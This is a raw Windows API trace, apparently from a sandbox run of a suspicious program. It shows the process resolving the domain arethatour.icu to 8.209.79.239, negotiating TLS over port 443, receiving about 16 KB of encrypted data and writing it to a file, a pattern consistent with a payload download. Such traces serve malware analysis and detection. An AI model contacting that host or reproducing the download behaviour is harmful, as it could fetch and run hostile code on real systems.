	[0229.715] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c80d170 | out: phkResult=0x1c80d170*=0x594) returned 0x0
	[0229.718] RegOpenKeyExW (in: hKey=0x594, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c80d058 | out: phkResult=0x1c80d058*=0x598) returned 0x0
	[0229.718] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x59c
	[0229.719] RegNotifyChangeKeyValue (hKey=0x598, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x59c, fAsynchronous=1) returned 0x0
	[0229.720] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c80d080 | out: phkResult=0x1c80d080*=0x5a0) returned 0x0
	[0229.720] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5a4
	[0229.720] RegNotifyChangeKeyValue (hKey=0x5a0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x5a4, fAsynchronous=1) returned 0x0
	[0229.720] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c80d080 | out: phkResult=0x1c80d080*=0x5a8) returned 0x0
	[0229.720] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5ac
	[0229.720] RegNotifyChangeKeyValue (hKey=0x5a8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x5ac, fAsynchronous=1) returned 0x0
	[0229.721] GetCurrentProcess () returned 0xffffffffffffffff
	[0229.721] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80cfe8 | out: TokenHandle=0x1c80cfe8*=0x5b0) returned 1
	[0229.730] GetCurrentProcess () returned 0xffffffffffffffff
	[0229.730] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80c7b8 | out: TokenHandle=0x1c80c7b8*=0x5b4) returned 1
	[0229.736] GetCurrentProcess () returned 0xffffffffffffffff
	[0229.736] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80c7b8 | out: TokenHandle=0x1c80c7b8*=0x5b8) returned 1
	[0229.750] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c80d0b8 | out: pProxyConfig=0x1c80d0b8) returned 1
	[0230.247] SetEvent (hEvent=0x4f8) returned 1
	[0230.407] GetCurrentProcess () returned 0xffffffffffffffff
	[0230.407] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80c828 | out: TokenHandle=0x1c80c828*=0x604) returned 1
	[0230.408] GetCurrentProcess () returned 0xffffffffffffffff
	[0230.408] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80c828 | out: TokenHandle=0x1c80c828*=0x608) returned 1
	[0230.409] SetEvent (hEvent=0x4f8) returned 1
	[0230.427] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c80ccf8 | out: pFixedInfo=0x0, pOutBufLen=0x1c80ccf8) returned 0x6f
	[0230.714] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b83c850
	[0230.714] GetNetworkParams (in: pFixedInfo=0x1b83c850, pOutBufLen=0x1c80ccf8 | out: pFixedInfo=0x1b83c850, pOutBufLen=0x1c80ccf8) returned 0x0
	[0230.732] CoTaskMemAlloc (cb=0xd) returned 0x1b83d250
	[0230.733] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0230.733] CoTaskMemFree (pv=0x1b83d250) 
	[0230.737] LocalFree (hMem=0x1b83c850) returned 0x0
	[0230.856] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x610
	[0230.856] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x60c
	[0230.857] CoTaskMemAlloc (cb=0x10) returned 0x1b83d250
	[0230.857] getaddrinfo (in: pNodeName="arethatour.icu", pServiceName=0x0, pHints=0x1c80cca0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c80cc98 | out: ppResult=0x1c80cc98*=0x1b82f230*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="arethatour.icu", ai_addr=0x1b83d290*(sa_family=2, sin_port=0x0, sin_addr="8.209.79.239"), ai_next=0x0)) returned 0
	[0231.504] CoTaskMemFree (pv=0x1b83d250) 
	[0231.504] CoTaskMemFree (pv=0x0) 
	[0231.505] FreeAddrInfoW (pAddrInfo=0x1b82f230*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="牡瑥慨潴牵椮畣", ai_addr=0x1b83d290*(sa_family=2, sin_port=0x0, sin_addr="8.209.79.239"), ai_next=0x0)) 
	[0231.506] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x614
	[0231.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x618
	[0231.507] ioctlsocket (in: s=0x614, cmd=-2147195266, argp=0x1c80ccb8 | out: argp=0x1c80ccb8) returned 0
	[0231.507] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x61c
	[0231.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x620
	[0231.507] ioctlsocket (in: s=0x61c, cmd=-2147195266, argp=0x1c80ccb8 | out: argp=0x1c80ccb8) returned 0
	[0231.507] WSAIoctl (in: s=0x614, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c80cc30, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c80cc30, lpOverlapped=0x0) returned -1
	[0231.507] CoTaskMemAlloc (cb=0x204) returned 0x1b826e10
	[0231.507] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1b826e10, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0231.507] CoTaskMemFree (pv=0x1b826e10) 
	[0231.507] WSAEventSelect (s=0x614, hEventObject=0x618, lNetworkEvents=512) returned 0
	[0231.508] WSAIoctl (in: s=0x61c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c80cc30, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c80cc30, lpOverlapped=0x0) returned -1
	[0231.508] CoTaskMemAlloc (cb=0x204) returned 0x1b826e10
	[0231.508] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1b826e10, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0231.508] CoTaskMemFree (pv=0x1b826e10) 
	[0231.508] WSAEventSelect (s=0x61c, hEventObject=0x620, lNetworkEvents=512) returned 0
	[0231.510] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x1c80c788*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x1c80c788*=0xbf0) returned 0x6f
	[0231.634] LocalAlloc (uFlags=0x0, uBytes=0xbf0) returned 0x1b85c110
	[0231.634] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x1b85c110, SizePointer=0x1c80c788*=0xbf0 | out: AdapterAddresses=0x1b85c110*(Alignment=0xe000001c0, Length=0x1c0, IfIndex=0xe, Next=0x1b85c440, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0x1b85c390, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x0, [1]=0x1c, [2]=0x34, [3]=0xa2, [4]=0x42, [5]=0x2b, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x1b85c2d0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0x1c80c788*=0xbf0) returned 0x0
	[0231.647] LocalFree (hMem=0x1b85c110) returned 0x0
	[0231.649] WSAConnect (in: s=0x610, name=0x32754a0*(sa_family=2, sin_port=0x1bb, sin_addr="8.209.79.239"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0231.670] closesocket (s=0x60c) returned 0
	[0231.708] EnumerateSecurityPackagesW (in: pcPackages=0x1c80cb18, ppPackageInfo=0x1c80cb10 | out: pcPackages=0x1c80cb18, ppPackageInfo=0x1c80cb10) returned 0x0
	[0231.712] lstrlenW (lpString="Negotiate") returned 9
	[0231.713] CoTaskMemAlloc (cb=0x16) returned 0x1b83d250
	[0231.713] RtlMoveMemory (in: Destination=0x1b83d250, Source=0x1bbcf0, Length=0x14 | out: Destination=0x1b83d250) 
	[0231.713] CoTaskMemFree (pv=0x1b83d250) 
	[0231.713] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0231.713] CoTaskMemAlloc (cb=0x3c) returned 0x1b82a6e0
	[0231.713] RtlMoveMemory (in: Destination=0x1b82a6e0, Source=0x1bbd04, Length=0x3a | out: Destination=0x1b82a6e0) 
	[0231.713] CoTaskMemFree (pv=0x1b82a6e0) 
	[0231.713] lstrlenW (lpString="NegoExtender") returned 12
	[0231.713] CoTaskMemAlloc (cb=0x1c) returned 0x1b855f50
	[0231.713] RtlMoveMemory (in: Destination=0x1b855f50, Source=0x1bbd3e, Length=0x1a | out: Destination=0x1b855f50) 
	[0231.713] CoTaskMemFree (pv=0x1b855f50) 
	[0231.713] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0231.713] CoTaskMemAlloc (cb=0x3e) returned 0x1b82a6e0
	[0231.713] RtlMoveMemory (in: Destination=0x1b82a6e0, Source=0x1bbd58, Length=0x3c | out: Destination=0x1b82a6e0) 
	[0231.713] CoTaskMemFree (pv=0x1b82a6e0) 
	[0231.713] lstrlenW (lpString="Kerberos") returned 8
	[0231.713] CoTaskMemAlloc (cb=0x14) returned 0x1b83d250
	[0231.713] RtlMoveMemory (in: Destination=0x1b83d250, Source=0x1bbd94, Length=0x12 | out: Destination=0x1b83d250) 
	[0231.714] CoTaskMemFree (pv=0x1b83d250) 
	[0231.714] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0231.714] CoTaskMemAlloc (cb=0x32) returned 0x1b82f370
	[0231.714] RtlMoveMemory (in: Destination=0x1b82f370, Source=0x1bbda6, Length=0x30 | out: Destination=0x1b82f370) 
	[0231.714] CoTaskMemFree (pv=0x1b82f370) 
	[0231.714] lstrlenW (lpString="NTLM") returned 4
	[0231.714] CoTaskMemAlloc (cb=0xc) returned 0x1b83d250
	[0231.714] RtlMoveMemory (in: Destination=0x1b83d250, Source=0x1bbdd6, Length=0xa | out: Destination=0x1b83d250) 
	[0231.714] CoTaskMemFree (pv=0x1b83d250) 
	[0231.714] lstrlenW (lpString="NTLM Security Package") returned 21
	[0231.714] CoTaskMemAlloc (cb=0x2e) returned 0x1b82f370
	[0231.714] RtlMoveMemory (in: Destination=0x1b82f370, Source=0x1bbde0, Length=0x2c | out: Destination=0x1b82f370) 
	[0231.714] CoTaskMemFree (pv=0x1b82f370) 
	[0231.714] lstrlenW (lpString="Schannel") returned 8
	[0231.714] CoTaskMemAlloc (cb=0x14) returned 0x1b83d250
	[0231.714] RtlMoveMemory (in: Destination=0x1b83d250, Source=0x1bbe0c, Length=0x12 | out: Destination=0x1b83d250) 
	[0231.714] CoTaskMemFree (pv=0x1b83d250) 
	[0231.714] lstrlenW (lpString="Schannel Security Package") returned 25
	[0231.714] CoTaskMemAlloc (cb=0x36) returned 0x1b82f370
	[0231.714] RtlMoveMemory (in: Destination=0x1b82f370, Source=0x1bbe1e, Length=0x34 | out: Destination=0x1b82f370) 
	[0231.714] CoTaskMemFree (pv=0x1b82f370) 
	[0231.714] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0231.714] CoTaskMemAlloc (cb=0x5c) returned 0x1b823380
	[0231.714] RtlMoveMemory (in: Destination=0x1b823380, Source=0x1bbe52, Length=0x5a | out: Destination=0x1b823380) 
	[0231.714] CoTaskMemFree (pv=0x1b823380) 
	[0231.714] lstrlenW (lpString="Schannel Security Package") returned 25
	[0231.714] CoTaskMemAlloc (cb=0x36) returned 0x1b82f370
	[0231.714] RtlMoveMemory (in: Destination=0x1b82f370, Source=0x1bbeac, Length=0x34 | out: Destination=0x1b82f370) 
	[0231.715] CoTaskMemFree (pv=0x1b82f370) 
	[0231.715] lstrlenW (lpString="WDigest") returned 7
	[0231.715] CoTaskMemAlloc (cb=0x12) returned 0x1b83d250
	[0231.715] RtlMoveMemory (in: Destination=0x1b83d250, Source=0x1bbee0, Length=0x10 | out: Destination=0x1b83d250) 
	[0231.715] CoTaskMemFree (pv=0x1b83d250) 
	[0231.715] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0231.715] CoTaskMemAlloc (cb=0x46) returned 0x1b82a6e0
	[0231.715] RtlMoveMemory (in: Destination=0x1b82a6e0, Source=0x1bbef0, Length=0x44 | out: Destination=0x1b82a6e0) 
	[0231.715] CoTaskMemFree (pv=0x1b82a6e0) 
	[0231.715] lstrlenW (lpString="TSSSP") returned 5
	[0231.715] CoTaskMemAlloc (cb=0xe) returned 0x1b83d250
	[0231.715] RtlMoveMemory (in: Destination=0x1b83d250, Source=0x1bbf34, Length=0xc | out: Destination=0x1b83d250) 
	[0231.715] CoTaskMemFree (pv=0x1b83d250) 
	[0231.715] lstrlenW (lpString="TS Service Security Package") returned 27
	[0231.715] CoTaskMemAlloc (cb=0x3a) returned 0x1b82a6e0
	[0231.715] RtlMoveMemory (in: Destination=0x1b82a6e0, Source=0x1bbf40, Length=0x38 | out: Destination=0x1b82a6e0) 
	[0231.715] CoTaskMemFree (pv=0x1b82a6e0) 
	[0231.715] lstrlenW (lpString="pku2u") returned 5
	[0231.715] CoTaskMemAlloc (cb=0xe) returned 0x1b83d250
	[0231.715] RtlMoveMemory (in: Destination=0x1b83d250, Source=0x1bbf78, Length=0xc | out: Destination=0x1b83d250) 
	[0231.715] CoTaskMemFree (pv=0x1b83d250) 
	[0231.715] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0231.715] CoTaskMemAlloc (cb=0x30) returned 0x1b82f370
	[0231.715] RtlMoveMemory (in: Destination=0x1b82f370, Source=0x1bbf84, Length=0x2e | out: Destination=0x1b82f370) 
	[0231.715] CoTaskMemFree (pv=0x1b82f370) 
	[0231.715] lstrlenW (lpString="CREDSSP") returned 7
	[0231.715] CoTaskMemAlloc (cb=0x12) returned 0x1b83d250
	[0231.716] RtlMoveMemory (in: Destination=0x1b83d250, Source=0x1bbfb2, Length=0x10 | out: Destination=0x1b83d250) 
	[0231.716] CoTaskMemFree (pv=0x1b83d250) 
	[0231.716] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0231.716] CoTaskMemAlloc (cb=0x4a) returned 0x1b811490
	[0231.716] RtlMoveMemory (in: Destination=0x1b811490, Source=0x1bbfc2, Length=0x48 | out: Destination=0x1b811490) 
	[0231.716] CoTaskMemFree (pv=0x1b811490) 
	[0231.716] FreeContextBuffer (in: pvContextBuffer=0x1bbbb0 | out: pvContextBuffer=0x1bbbb0) returned 0x0
	[0231.724] GetCurrentProcess () returned 0xffffffffffffffff
	[0231.724] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80c5f8 | out: TokenHandle=0x1c80c5f8*=0x60c) returned 1
	[0231.728] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x3277040, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c80c508, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c80c4f8, ptsExpiry=0x1c80c4f0 | out: phCredential=0x1c80c4f8, ptsExpiry=0x1c80c4f0) returned 0x0
	[0231.853] InitializeSecurityContextW (in: phCredential=0x1c80c700, phContext=0x0, pTargetName=0x326e6f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c80c6f0, pOutput=0x3279768, pfContextAttr=0x1c80c6e8, ptsExpiry=0x1c80c6e0 | out: phNewContext=0x1c80c6f0, pOutput=0x3279768, pfContextAttr=0x1c80c6e8, ptsExpiry=0x1c80c6e0) returned 0x90312
	[0231.854] FreeContextBuffer (in: pvContextBuffer=0x1b820570 | out: pvContextBuffer=0x1b820570) returned 0x0
	[0231.862] send (s=0x610, buf=0x3279838*, len=118, flags=0) returned 118
	[0231.863] recv (in: s=0x610, buf=0x3279838, len=5, flags=0 | out: buf=0x3279838*) returned 5
	[0231.893] recv (in: s=0x610, buf=0x327983d, len=85, flags=0 | out: buf=0x327983d*) returned 85
	[0231.894] InitializeSecurityContextW (in: phCredential=0x1c80c620, phContext=0x1c80c8d0, pTargetName=0x326e6f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3279af8, Reserved2=0x0, phNewContext=0x1c80c610, pOutput=0x3279b18, pfContextAttr=0x1c80c608, ptsExpiry=0x1c80c600 | out: phNewContext=0x1c80c610, pOutput=0x3279b18, pfContextAttr=0x1c80c608, ptsExpiry=0x1c80c600) returned 0x90312
	[0231.894] recv (in: s=0x610, buf=0x3279c08, len=5, flags=0 | out: buf=0x3279c08*) returned 5
	[0231.895] recv (in: s=0x610, buf=0x3279c2d, len=2812, flags=0 | out: buf=0x3279c2d*) returned 2812
	[0231.895] InitializeSecurityContextW (in: phCredential=0x1c80c550, phContext=0x1c80c800, pTargetName=0x326e6f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x327a800, Reserved2=0x0, phNewContext=0x1c80c540, pOutput=0x327a820, pfContextAttr=0x1c80c538, ptsExpiry=0x1c80c530 | out: phNewContext=0x1c80c540, pOutput=0x327a820, pfContextAttr=0x1c80c538, ptsExpiry=0x1c80c530) returned 0x90312
	[0231.895] recv (in: s=0x610, buf=0x327a910, len=5, flags=0 | out: buf=0x327a910*) returned 5
	[0231.895] recv (in: s=0x610, buf=0x327a935, len=4, flags=0 | out: buf=0x327a935*) returned 4
	[0231.895] InitializeSecurityContextW (in: phCredential=0x1c80c480, phContext=0x1c80c730, pTargetName=0x326e6f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x327aa10, Reserved2=0x0, phNewContext=0x1c80c470, pOutput=0x327aa30, pfContextAttr=0x1c80c468, ptsExpiry=0x1c80c460 | out: phNewContext=0x1c80c470, pOutput=0x327aa30, pfContextAttr=0x1c80c468, ptsExpiry=0x1c80c460) returned 0x90312
	[0231.897] FreeContextBuffer (in: pvContextBuffer=0x1ffdc0 | out: pvContextBuffer=0x1ffdc0) returned 0x0
	[0231.897] send (s=0x610, buf=0x327ab00*, len=582, flags=0) returned 582
	[0231.897] recv (in: s=0x610, buf=0x327ab00, len=5, flags=0 | out: buf=0x327ab00*) returned 5
	[0231.968] recv (in: s=0x610, buf=0x327ab05, len=1, flags=0 | out: buf=0x327ab05*) returned 1
	[0231.969] InitializeSecurityContextW (in: phCredential=0x1c80c3b0, phContext=0x1c80c660, pTargetName=0x326e6f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x327ae38, Reserved2=0x0, phNewContext=0x1c80c3a0, pOutput=0x327ae58, pfContextAttr=0x1c80c398, ptsExpiry=0x1c80c390 | out: phNewContext=0x1c80c3a0, pOutput=0x327ae58, pfContextAttr=0x1c80c398, ptsExpiry=0x1c80c390) returned 0x90312
	[0231.969] recv (in: s=0x610, buf=0x327af48, len=5, flags=0 | out: buf=0x327af48*) returned 5
	[0231.969] recv (in: s=0x610, buf=0x327af6d, len=48, flags=0 | out: buf=0x327af6d*) returned 48
	[0231.969] InitializeSecurityContextW (in: phCredential=0x1c80c2e0, phContext=0x1c80c590, pTargetName=0x326e6f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x327b070, Reserved2=0x0, phNewContext=0x1c80c2d0, pOutput=0x327b090, pfContextAttr=0x1c80c2c8, ptsExpiry=0x1c80c2c0 | out: phNewContext=0x1c80c2d0, pOutput=0x327b090, pfContextAttr=0x1c80c2c8, ptsExpiry=0x1c80c2c0) returned 0x0
	[0231.984] QueryContextAttributesW (in: phContext=0x1c80c540, ulAttribute=0x4, pBuffer=0x327b1a8 | out: pBuffer=0x327b1a8) returned 0x0
	[0231.984] QueryContextAttributesW (in: phContext=0x1c80c540, ulAttribute=0x5a, pBuffer=0x327b228 | out: pBuffer=0x327b228) returned 0x0
	[0231.999] QueryContextAttributesW (in: phContext=0x1c80c3f0, ulAttribute=0x53, pBuffer=0x327b578 | out: pBuffer=0x327b578) returned 0x0
	[0232.008] CertDuplicateCRLContext (pCrlContext=0x1b7f01b0) returned 0x1b7f01b0
	[0232.012] CertDuplicateStore (hCertStore=0x19c730) returned 0x19c730
	[0232.014] CertEnumCertificatesInStore (hCertStore=0x19c730, pPrevCertContext=0x0) returned 0x1b7f0130
	[0232.014] CertDuplicateCRLContext (pCrlContext=0x1b7f0130) returned 0x1b7f0130
	[0232.015] CertEnumCertificatesInStore (hCertStore=0x19c730, pPrevCertContext=0x1b7f0130) returned 0x1b7f01b0
	[0232.015] CertDuplicateCRLContext (pCrlContext=0x1b7f01b0) returned 0x1b7f01b0
	[0232.015] CertEnumCertificatesInStore (hCertStore=0x19c730, pPrevCertContext=0x1b7f01b0) returned 0x0
	[0232.015] CertCloseStore (hCertStore=0x19c730, dwFlags=0x0) returned 1
	[0232.015] CertFreeCRLContext (pCrlContext=0x1b7f01b0) returned 1
	[0232.026] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x19c660
	[0232.027] CertAddCRLLinkToStore (in: hCertStore=0x19c660, pCrlContext=0x1b7f0130, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0232.027] CertAddCRLLinkToStore (in: hCertStore=0x19c660, pCrlContext=0x1b7f01b0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0232.031] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b7f01b0, pTime=0x1c80c3f8, hAdditionalStore=0x19c660, pChainPara=0x1c80c400, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c80c3f0 | out: ppChainContext=0x1c80c3f0) returned 1
	[0233.348] CertDuplicateCertificateChain (pChainContext=0x1ceca9d0) returned 0x1ceca9d0
	[0233.349] CertDuplicateCRLContext (pCrlContext=0x1b7f01b0) returned 0x1b7f01b0
	[0233.349] CertDuplicateCRLContext (pCrlContext=0x1cf27ee0) returned 0x1cf27ee0
	[0233.349] CertDuplicateCRLContext (pCrlContext=0x1cf27f60) returned 0x1cf27f60
	[0233.350] CertFreeCertificateChain (pChainContext=0x1ceca9d0) 
	[0233.351] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1ceca9d0, pPolicyPara=0x1c80c578, pPolicyStatus=0x1c80c558 | out: pPolicyStatus=0x1c80c558) returned 1
	[0233.352] SetLastError (dwErrCode=0x0) 
	[0233.358] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ceca9d0, pPolicyPara=0x1c80c650, pPolicyStatus=0x1c80c638 | out: pPolicyStatus=0x1c80c638) returned 1
	[0233.360] CertFreeCertificateChain (pChainContext=0x1ceca9d0) 
	[0233.361] CertFreeCRLContext (pCrlContext=0x1b7f01b0) returned 1
	[0233.507] EncryptMessage (in: phContext=0x1c80cb30, fQOP=0x0, pMessage=0x327dea8, MessageSeqNo=0x0 | out: pMessage=0x327dea8) returned 0x0
	[0233.507] send (s=0x610, buf=0x327dbe8*, len=117, flags=0) returned 117
	[0233.526] setsockopt (s=0x610, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0233.526] recv (in: s=0x610, buf=0x327e008, len=5, flags=0 | out: buf=0x327e008*) returned 5
	[0233.533] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 14475
	[0233.533] recv (in: s=0x610, buf=0x32818b8, len=1941, flags=0 | out: buf=0x32818b8*) returned 1941
	[0233.551] DecryptMessage (in: phContext=0x1c80c6f0, pMessage=0x3282160, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3282160, pfQOP=0x0) returned 0x0
	[0233.588] setsockopt (s=0x610, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0233.592] WriteFile (in: hFile=0x4c8, lpBuffer=0x3293550*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c80d268, lpOverlapped=0x0 | out: lpBuffer=0x3293550*, lpNumberOfBytesWritten=0x1c80d268*=0x1000, lpOverlapped=0x0) returned 1
